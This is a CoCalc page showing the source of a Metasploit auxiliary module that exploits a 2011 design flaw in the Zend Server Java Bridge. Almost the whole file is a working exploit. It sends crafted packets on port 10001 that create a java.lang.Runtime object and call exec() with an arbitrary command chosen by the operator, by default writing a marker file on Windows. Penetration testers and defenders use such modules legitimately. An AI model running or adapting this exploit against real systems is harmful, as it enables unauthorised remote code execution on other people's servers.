Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/zend/java_bridge.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',

14
        'Description' => %q{

15
          This module abuses a flaw in the Zend Java Bridge Component of

16
          the Zend Server Framework. By sending a specially crafted packet, an

17
          attacker may be able to execute arbitrary code.

18


19
          NOTE: This module has only been tested with the Win32 build of the software.

20
        },

21
        'Author' => [ 'ikki', 'MC' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          ['OSVDB', '71420'],

25
          ['ZDI', '11-113'],

26
          ['EDB', '17078'],

27
        ],

28
        'DisclosureDate' => '2011-03-28',

29
        'Notes' => {

30
          'Stability' => [CRASH_SAFE],

31
          'SideEffects' => [IOC_IN_LOGS],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options(

38
      [

39
        Opt::RPORT(10001),

40
        OptString.new('CMD', [false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),

41
      ]

42
    )

43
  end

44


45
  def run

46
    cmd = datastore['CMD']

47


48
    connect

49


50
    java_object = [0x33000000].pack('V') + [0x00000000].pack('V')

51
    java_object << [0x0c000000].pack('V') + 'CreateObject'

52
    java_object << [0x02000000].pack('V') + [0x00000004].pack('V')

53
    java_object << "\x11" + 'java.lang.Runtime' + "\x07"

54
    java_object << [0x00000000].pack('V')

55


56
    print_status("Creating the Java Object 'java.lang.Runtime'")

57
    sock.put(java_object)

58
    res = sock.get_once || ''

59
    classid = res[5, 4]

60


61
    runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')

62
    runtime << 'getRuntime' + [0x00000000].pack('V')

63


64
    print_status("Invoking static method 'getRuntime()'")

65
    sock.put(runtime)

66
    res = sock.get_once || ''

67
    methodid = res[5, 4]

68


69
    exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid

70
    exec << [0x04000000].pack('V') + 'exec' + [0x01000000].pack('V')

71
    exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd

72


73
    print_status("Invoking method 'exec()' with parameter '#{cmd}'")

74
    sock.put(exec)

75
    success = sock.get_once || ''

76
    if (success =~ /\x00\x00\x00/)

77
      print_status('Cleaning up the JVM')

78
      rm = [0x11000000].pack('V') + [0xffffffff].pack('V')

79
      rm << [0x05000000].pack('V') + 'reset'

80
      rm << [0x00000000].pack('V')

81
      sock.put(rm)

82
    else

83
      print_error('Failed to run command...')

84
      disconnect

85
      return

86
    end

87


88
    disconnect

89
  end

90
end

91


92